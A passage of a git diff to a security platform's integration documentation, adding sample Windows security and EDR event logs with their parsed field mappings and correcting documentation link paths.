02:20:37\",\"SourceModuleName\":\"eventlogs\",\"SourceModuleType\":\"im_msvistalog\"}\n", + "event": { + "code": "1", + "message": "D\u00e9tection possible de CVE : [CVE-2020-158] cert chain exceeded limit\r\nInformations suppl\u00e9mentaires : Cert: sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\r\n\r\nCet \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 lorsqu\u2019une tentative d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 connue ([CVE-2020-158] cert chain exceeded limit) est d\u00e9tect\u00e9e.\r\nCet \u00e9v\u00e9nement est d\u00e9clench\u00e9 par un processus en mode utilisateur.\r\n", + "provider": "Microsoft-Windows-Audit-CVE" + }, + "action": { + "id": 1, + "properties": { + "AccountName": "System", + "AccountType": "User", + "CVEID": "[CVE-2020-158] cert chain exceeded limit", + "Domain": "AUTORITE NT", + "EventType": "WARNING", + "Keywords": "-9223372036854775808", + "OpcodeValue": 0, + "ProviderGuid": "{85A62A0D-7E17-485F-9D4F-749A287193A6}", + "Severity": "WARNING", + "SourceName": "Microsoft-Windows-Audit-CVE", + "Task": 0 + }, + "record_id": 606266, + "type": "Application" + }, + "host": { + "hostname": "srv023.example.com", + "name": "srv023.example.com" + }, + "log": { + "hostname": "srv023.example.com", + "level": "warning" + }, + "os": { + "family": "windows", + "platform": "windows" + }, + "process": { + "id": 2392, + "pid": 2392, + "thread": { + "id": 2932 + } + }, + "related": { + "hosts": [ + "srv023.example.com" + ], + "user": [ + "System" + ] + }, + "user": { + "domain": "AUTORITE NT", + "id": "S-1-5-18", + "name": "System" + } + } + + ``` + + === "bits-file-transfert.json" ```json @@ -2595,6 +2884,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "Severity": "INFO", "SourceName": "Microsoft-Windows-Security-Auditing", "TargetDomainName": "AD", + "TargetLogonId": "0x3912391a", "TargetUserName": "USERFOO", "TargetUserSid": "S-1-5-21-1519513455-2607746426-4144247390-71234", "Task": 12545 @@ -2681,6 +2971,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "-", "SubjectUserSid": "S-1-0-0", "TargetDomainName": "KEY", + "TargetLogonId": "0xfbee0744", "TargetUserName": "SVC_DD_SP-SEARCH", "TargetUserSid": "S-1-5-21-1574594750-1263408776-2012955550-69701", "Task": 12544, @@ -2788,6 +3079,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "PCFOO$", "SubjectUserSid": "S-1-5-18", "TargetDomainName": "AUTORITE NT", + "TargetLogonId": "0x7e767bc", "TargetOutboundDomainName": "FOOBAR", "TargetOutboundUserName": "svc_admin_sccm", "TargetUserName": "Syst\u00e8me", @@ -2889,6 +3181,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "Severity": "INFO", "SourceName": "Microsoft-Windows-Security-Auditing", "TargetDomainName": "AD", + "TargetLogonId": "0x3912391a", "TargetUserName": "USERFOO", "TargetUserSid": "S-1-5-21-1519513455-2607746426-4144247390-71234", "Task": 12545 @@ -3144,6 +3437,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "adm_FOOBAZ", "SubjectUserSid": "S-1-5-21-1574594750-1263408776-2012955550-122301", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 @@ -3167,6 +3461,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "executable": "C:\\Windows\\System32\\wbem\\WMIC.exe", "id": 11260, "name": "WMIC.exe", + "parent": { + "pid": 4 + }, "pid": 11260, "thread": { "id": 13732 @@ -3348,6 +3645,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "Domain": "NT AUTHORITY", "EventType": "VERBOSE", "Keywords": "0", + "MessageNumber": "1", + "MessageTotal": "1", "OpcodeValue": 15, "ProviderGuid": "{A0C1853B-5C40-4B15-8766-3CF1C58F985A}", "ScriptBlockId": "592078b2-e981-40be-a166-10896495067b", @@ -4038,6 +4337,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "REDACTED", "SubjectUserSid": "S-1-5-18", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 @@ -4066,6 +4366,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "command_line": "C:\\Windows\\System32\\svchost.exe", "executable": "C:\\Windows\\System32\\svchost.exe", "name": "svchost.exe", + "pid": 4, "working_directory": "C:\\Windows\\System32\\" }, "pid": 3648, @@ -4335,6 +4636,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "EventType": "AUDIT_SUCCESS", "HomeDirectory": "-", "Keywords": "-9214364837600034816", + "NewUAC": "0x15", + "OldUAC": "0x0", "OpcodeValue": 0, "PrivilegeList": "-", "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", @@ -4875,6 +5178,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "HOSTFOOBAR", "SubjectUserSid": "S-1-5-18", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 @@ -4903,6 +5207,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "command_line": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "executable": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "name": "powershell.exe", + "pid": 4, "working_directory": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" }, "pid": 3920, @@ -4959,6 +5264,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "SubjectUserName": "USERFOO", "SubjectUserSid": "S-1-5-21-1574594750-1263408776-2012955550-78445", "TargetDomainName": "-", + "TargetLogonId": "0x0", "TargetUserName": "-", "TargetUserSid": "S-1-0-0", "Task": 13312 @@ -4987,6 +5293,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "command_line": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "executable": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe", "name": "chrome.exe", + "pid": 4, "working_directory": "C:\\Program Files (x86)\\Google\\Chrome\\Application\\" }, "pid": 5004, @@ -5076,7 +5383,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I }, "registry": { "hive": "HKU", - "key": "\\S-1-5-21-375581984-207109644-1491462053-1001\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2008.12711.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe", + "key": "\\S-1-5-21-375581984-207109644-1491462053-1001\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2008.12711.0_x64__8wekyb3d8bbwe\\", "path": "HKU\\\\S-1-5-21-375581984-207109644-1491462053-1001\\\\Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\WindowsApps\\\\Microsoft.MicrosoftOfficeHub_18.2008.12711.0_x64__8wekyb3d8bbwe\\\\LocalBridge.exe", "value": "LocalBridge.exe" }, @@ -5637,7 +5944,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "REG_DWORD" }, "hive": "HKLM", - "key": "System\\CurrentControlSet\\Control\\Lsa\\nolmhash", + "key": "System\\CurrentControlSet\\Control\\Lsa", "path": "HKLM\\System\\CurrentControlSet\\Control\\Lsa\\nolmhash", "value": "nolmhash" }, @@ -5726,7 +6033,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "REG_SZ" }, "hive": "HKLM", - "key": "System\\CurrentControlSet\\services\\NAVENG\\ImagePath", + "key": "System\\CurrentControlSet\\services\\NAVENG", "path": "HKLM\\System\\CurrentControlSet\\services\\NAVENG\\ImagePath", "value": "ImagePath" }, @@ -7040,6 +7347,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "executable": "C:\\Windows\\System32\\qwinsta.exe", "id": 12980, "name": "qwinsta.exe", + "parent": { + "pid": 4 + }, "pid": 12980, "thread": { "id": 92 @@ -7110,6 +7420,9 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "executable": "C:\\Windows\\System32\\conhost.exe", "id": 4380, "name": "conhost.exe", + "parent": { + "pid": 4 + }, "pid": 4380, "thread": { "id": 88 @@ -7178,6 +7491,7 @@ The following table lists the fields that are extracted, normalized under the EC |`action.properties.Accesses` | `keyword` | | |`action.properties.AdditionalActionsID` | `keyword` | | |`action.properties.AdditionalActionsString` | `keyword` | | +|`action.properties.Attributes` | `keyword` | | |`action.properties.BytesTotal` | `keyword` | | |`action.properties.ConfigurationFile` | `keyword` | | |`action.properties.Content` | `keyword` | | @@ -7199,12 +7513,15 @@ The following table lists the fields that are extracted, normalized under the EC |`action.properties.LastQuickScanAge` | `keyword` | | |`action.properties.MessEventType` | `keyword` | | |`action.properties.New Value` | `keyword` | | +|`action.properties.NewUAC` | `keyword` | | |`action.properties.NewValue` | `keyword` | | |`action.properties.Old Value` | `keyword` | | +|`action.properties.OldUAC` | `keyword` | | |`action.properties.ParentImage` | `keyword` | | |`action.properties.ProcessName` | `keyword` | | |`action.properties.ProxyServer` | `keyword` | | |`action.properties.ReferrerUrl` | `keyword` | | +|`action.properties.Requester` | `keyword` | | |`action.properties.SentUpdateServer` | `keyword` | | |`action.properties.ServiceFileName` | `keyword` | | |`action.properties.StartFunction` | `keyword` | | @@ -7257,6 +7574,7 @@ The following table lists the fields that are extracted, normalized under the EC |`process.parent.command_line` | `wildcard` | Full command line that started the process. | |`process.parent.executable` | `keyword` | Absolute path to the process executable. | |`process.parent.name` | `keyword` | Process name. | +|`process.parent.pid` | `long` | Process id. | |`process.parent.working_directory` | `keyword` | The working directory of the process. | |`process.pid` | `long` | Process id. | |`process.ppid` | `integer` | | @@ -7280,7 +7598,6 @@ The following table lists the fields that are extracted, normalized under the EC |`url.path` | `wildcard` | Path of the request, such as "/search". | |`url.scheme` | `keyword` | Scheme of the url. | |`user.domain` | `keyword` | Name of the directory the user is a member of. | -|`user.email` | `keyword` | User email address. | |`user.id` | `keyword` | Unique identifier of the user. | |`user.name` | `keyword` | Short name or login of the user. | |`user.target.domain` | `keyword` | Name of the directory the user is a member of. | diff --git a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md index a6f6c67327..12f07bd4b9 100644 --- a/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md +++ b/_shared_content/operations_center/integrations/generated/9281438c-f7c3-4001-9bcc-45fd108ba1be_sample.md @@ -351,6 +351,64 @@ In this section, you will find examples of raw logs as generated natively by the +=== "Event_4738" + + ``` + { + "EventTime": "2024-05-06 11:38:15", + "Hostname": "server01.example.org", + "Keywords": -9214364837600034816, + "EventType": "AUDIT_SUCCESS", + "SeverityValue": 2, + "Severity": "INFO", + "EventID": 4738, + "SourceName": "Microsoft-Windows-Security-Auditing", + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "Version": 0, + "Task": 13824, + "OpcodeValue": 0, + "RecordNumber": 105098604, + "ProcessID": 688, + "ThreadID": 2676, + "Channel": "Security", + "Message": "A user account was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E6\r\n\r\nTarget Account:\r\n\tSecurity ID:\t\tS-1-5-21-1111111111-222222222-444444444-55555\r\n\tAccount Name:\t\tjdoe\r\n\tAccount Domain:\t\tEXAMPLE\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tDisplay Name:\t\t-\r\n\tUser Principal Name:\t-\r\n\tHome Directory:\t\t-\r\n\tHome Drive:\t\t-\r\n\tScript Path:\t\t-\r\n\tProfile Path:\t\t-\r\n\tUser Workstations:\t-\r\n\tPassword Last Set:\t06.05.2024 11:38:15\r\n\tAccount Expires:\t\t-\r\n\tPrimary Group ID:\t-\r\n\tAllowedToDelegateTo:\t-\r\n\tOld UAC Value:\t\t-\r\n\tNew UAC Value:\t\t-\r\n\tUser Account Control:\t-\r\n\tUser Parameters:\t-\r\n\tSID History:\t\t-\r\n\tLogon Hours:\t\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-", + "Category": "User Account Management", + "Opcode": "Info", + "Dummy": "-", + "TargetUserName": "jdoe", + "TargetDomainName": "EXAMPLE", + "TargetSid": "S-1-5-21-1111111111-222222222-444444444-55555", + "SubjectUserSid": "S-1-5-7", + "SubjectUserName": "ANONYMOUS LOGON", + "SubjectDomainName": "NT AUTHORITY", + "SubjectLogonId": "0x3e6", + "PrivilegeList": "-", + "SamAccountName": "-", + "DisplayName": "-", + "UserPrincipalName": "-", + "HomeDirectory": "-", + "HomePath": "-", + "ScriptPath": "-", + "ProfilePath": "-", + "UserWorkstations": "-", + "PasswordLastSet": "06.05.2024 11:38:15", + "AccountExpires": "-", + "PrimaryGroupId": "-", + "AllowedToDelegateTo": "-", + "OldUacValue": "321", + "NewUacValue": "123", + "UserAccountControl": "-", + "UserParameters": "-", + "SidHistory": "-", + "LogonHours": "-", + "EventReceivedTime": "2024-05-06 11:38:16", + "SourceModuleName": "SecurityLog", + "SourceModuleType": "im_msvistalog" + } + ``` + + + === "Event_4768" ``` @@ -431,6 +489,59 @@ In this section, you will find examples of raw logs as generated natively by the +=== "Event_4825_1" + + ``` + { + "Hostname": "mars.example.org", + "EventType": "AUDIT_FAILURE", + "Severity": "ERROR", + "EventID": 4825, + "SourceName": "Microsoft-Windows-Security-Auditing", + "ProcessID": 632, + "Channel": "Security", + "Message": "A user was denied the access to Remote Desktop. By default, users are allowed to connect only if they are members of the Remote Desktop Users group or Administrators group.\r\n\r\nSubject:\r\n\tUser Name:\tJDOE\r\n\tDomain:\t\tEXAMPLE\r\n\tLogon ID:\t0xA360BC6B\r\n\r\nAdditional Information:\r\n\tClient Address:\t1.2.3.4\r\n\r\n\r\nThis event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.", + "Category": "Other Logon/Logoff Events" + } + ``` + + + +=== "Event_4886" + + ``` + { + "EventTime": "2024-07-10 14:57:48", + "Hostname": "FD001.example.org", + "Keywords": -9214364837600034816, + "EventType": "AUDIT_SUCCESS", + "SeverityValue": 2, + "Severity": "INFO", + "EventID": 4886, + "SourceName": "Microsoft-Windows-Security-Auditing", + "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", + "Version": 0, + "Task": 12805, + "OpcodeValue": 0, + "RecordNumber": 4403229, + "ActivityID": "{47CB07C4-5532-467D-A89C-724B854B59F7}", + "ProcessID": 900, + "ThreadID": 8040, + "Channel": "Security", + "Message": "Certificate Services received a certificate request.\r\n\t\r\nRequest ID:\t2715945\r\nRequester:\tEXAMPLE\\jdoe\r\nAttributes:\t\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "Category": "Certification Services", + "Opcode": "Info", + "RequestId": "2715945", + "Requester": "EXAMPLE\\jdoe", + "Attributes": "\nCertificateTemplate:NDSEClient\r\n\nccm:NDFR10923.example.org", + "EventReceivedTime": "2024-07-10 14:57:50", + "SourceModuleName": "SecurityLog", + "SourceModuleType": "im_msvistalog" + } + ``` + + + === "Event_4929" ``` @@ -976,6 +1087,42 @@ In this section, you will find examples of raw logs as generated natively by the +=== "audit_cve" + + ``` + { + "EventTime": "2024-07-06 02:20:36", + "Hostname": "srv023.example.com", + "Keywords": -9223372036854775808, + "EventType": "WARNING", + "SeverityValue": 3, + "Severity": "WARNING", + "EventID": 1, + "SourceName": "Microsoft-Windows-Audit-CVE", + "ProviderGuid": "{85A62A0D-7E17-485F-9D4F-749A287193A6}", + "Version": 0, + "Task": 0, + "OpcodeValue": 0, + "RecordNumber": 606266, + "ProcessID": 2392, + "ThreadID": 2932, + "Channel": "Application", + "Domain": "AUTORITE NT", + "AccountName": "System", + "UserID": "S-1-5-18", + "AccountType": "User", + "Message": "D\u00e9tection possible de CVE : [CVE-2020-158] cert chain exceeded limit\r\nInformations suppl\u00e9mentaires : Cert: sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12\r\n\r\nCet \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 lorsqu\u2019une tentative d\u2019exploitation d\u2019une vuln\u00e9rabilit\u00e9 connue ([CVE-2020-158] cert chain exceeded limit) est d\u00e9tect\u00e9e.\r\nCet \u00e9v\u00e9nement est d\u00e9clench\u00e9 par un processus en mode utilisateur.\r\n", + "Opcode": "Informations", + "CVEID": "[CVE-2020-158] cert chain exceeded limit", + "AdditionalDetails": "Cert: <CS.EXAMPLE.ORG> sha1: ADC83B19E793491B1C6EA0FD8B46CD9F32E592FC IssuerDepthCount: 13 Limit: 12", + "EventReceivedTime": "2024-07-06 02:20:37", + "SourceModuleName": "eventlogs", + "SourceModuleType": "im_msvistalog" + } + ``` + + + === "bits-file-transfert" ``` diff --git a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md index e5a02a35ac..234b8b327d 100644 --- a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md +++ b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "affectedhost_event.json" @@ -130,6 +130,50 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "alert_event_1.json" + + ```json + + { + "message": "{\n \"id\": \"00000-00000-0000-000000.0000000000000\",\n \"type\": \"alerts\",\n \"attributes\": {\n \"traceId\": \"00000-000-00000-0000-0000\",\n \"parentTraceId\": \"000-00-000-000000-00\",\n \"rootTraceId\": \"00-11-11-22-33\",\n \"aGuid\": \"17976A50-2B41-11EC-05DE-B831B5451A77\",\n \"detectionDate\": \"2024-07-31T15:46:52.211+00:00\",\n \"eventDate\": \"2024-07-31T15:20:26.271Z\",\n \"eventType\": \"alert\",\n \"severity\": \"s0\",\n \"score\": 5,\n \"detectionTags\": [\n \"@ATA.Collection\",\n \"@ATA.Discovery\",\n \"@ATE.T1074.001\",\n \"@ATE.T1049\",\n \"@MSI.some_other_rule\"\n ],\n \"relatedTraceIds\": [\n \"30a35a99-dcdf-4d9c-8051-461d6dc8b505\"\n ],\n \"ruleId\": \"some_other_rule\",\n \"rank\": 5,\n \"pid\": 1111,\n \"version\": \"undefined\",\n \"parentsTraceId\": [\n \"000-00-000-000000-00\",\n \"00-11-11-22-33\"],\n \"processName\": \"TestingTest+.exe\",\n \"user\": \"testing_user\",\n \"cmdLine\": \"\\\"c:\\\\Program Files (x86)\\\\TestingTest\\\\SSSSSSSSS\\\\TestingTest+.exe\\\" \",\n \"hashId\": \"testHashId\",\n \"h_os\": \"windows\",\n \"domain\": \"testDomain\",\n \"hostName\": \"testHostName\"\n }\n}", + "event": { + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-31T15:20:26.271000Z", + "host": { + "name": "testHostName", + "os": { + "full": "windows" + } + }, + "observer": { + "product": "EDR", + "vendor": "Trellix" + }, + "process": { + "command_line": "\"c:\\Program Files (x86)\\TestingTest\\SSSSSSSSS\\TestingTest+.exe\" ", + "name": "TestingTest+.exe", + "pid": 1111 + }, + "related": { + "user": [ + "testing_user" + ] + }, + "rule": { + "id": "some_other_rule" + }, + "user": { + "name": "testing_user" + } + } + + ``` + + === "detection_event.json" ```json diff --git a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md index 39baa317ca..92ffb3a2f5 100644 --- a/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md +++ b/_shared_content/operations_center/integrations/generated/954a6488-6394-4385-8427-621541e881d5_sample.md @@ -109,6 +109,54 @@ In this section, you will find examples of raw logs as generated natively by the +=== "alert_event_1" + + + ```json + { + "id": "00000-00000-0000-000000.0000000000000", + "type": "alerts", + "attributes": { + "traceId": "00000-000-00000-0000-0000", + "parentTraceId": "000-00-000-000000-00", + "rootTraceId": "00-11-11-22-33", + "aGuid": "17976A50-2B41-11EC-05DE-B831B5451A77", + "detectionDate": "2024-07-31T15:46:52.211+00:00", + "eventDate": "2024-07-31T15:20:26.271Z", + "eventType": "alert", + "severity": "s0", + "score": 5, + "detectionTags": [ + "@ATA.Collection", + "@ATA.Discovery", + "@ATE.T1074.001", + "@ATE.T1049", + "@MSI.some_other_rule" + ], + "relatedTraceIds": [ + "30a35a99-dcdf-4d9c-8051-461d6dc8b505" + ], + "ruleId": "some_other_rule", + "rank": 5, + "pid": 1111, + "version": "undefined", + "parentsTraceId": [ + "000-00-000-000000-00", + "00-11-11-22-33" + ], + "processName": "TestingTest+.exe", + "user": "testing_user", + "cmdLine": "\"c:\\Program Files (x86)\\TestingTest\\SSSSSSSSS\\TestingTest+.exe\" ", + "hashId": "testHashId", + "h_os": "windows", + "domain": "testDomain", + "hostName": "testHostName" + } + } + ``` + + + === "detection_event" diff --git a/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md b/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md index 9302e28634..17047fb24b 100644 --- a/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md +++ b/_shared_content/operations_center/integrations/generated/98fa7079-41ae-4033-a93f-bbd70d114188.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_aianalyst.json" diff --git a/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md b/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md index a8cc1f7d28..efe4ac322b 100644 --- a/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md +++ b/_shared_content/operations_center/integrations/generated/995d7daf-4e4a-42ec-b90d-9af2f7be7019.md @@ -26,7 +26,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_dhcp_lease.json" diff --git a/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md b/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md index 75edea3607..0e2b90c4c5 100644 --- a/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md +++ b/_shared_content/operations_center/integrations/generated/99da26fc-bf7b-4e5b-a76c-408472fcfebb.md @@ -19,7 +19,7 @@ The following table lists the data source offered by this integration. ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "ioc_view_no_pwd_set.json" diff --git a/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md b/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md index f585cd5cd5..3fc165585b 100644 --- a/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md +++ b/_shared_content/operations_center/integrations/generated/9b95c9cf-8b78-4830-a1ed-b9e88f05e67a.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "alerts_1.json" diff --git a/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md b/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md index 96f9c3e186..59567022a7 100644 --- a/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md +++ b/_shared_content/operations_center/integrations/generated/9f47aa9f-52d7-4849-9462-cf7fc8bcd51a.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of the collected data. === "test_auth_failed_login.json" diff --git a/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md b/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md index d897b61e53..0c6957640c 100644 --- a/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md +++ b/_shared_content/operations_center/integrations/generated/9f89b634-0531-437b-b060-a9d9f2d270db.md @@ -25,7 +25,7 @@ In details, the following table denotes the type of events produced by this inte ### Transformed Events Samples after Ingestion -This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/docs/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/docs/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/docs/xdr/features/detect/sigma) and to leverage the full potential of the collected data. +This section demonstrates how the raw logs will be transformed by our parsers. It shows the extracted fields that will be available for use in the [built-in detection rules](/xdr/features/detect/rules_catalog) and hunting activities in the [events page](/xdr/features/investigate/events). Understanding these transformations is essential for analysts to create effective detection mechanisms with [custom detection rules](/xdr/features/detect/sigma) and to leverage the full potential of 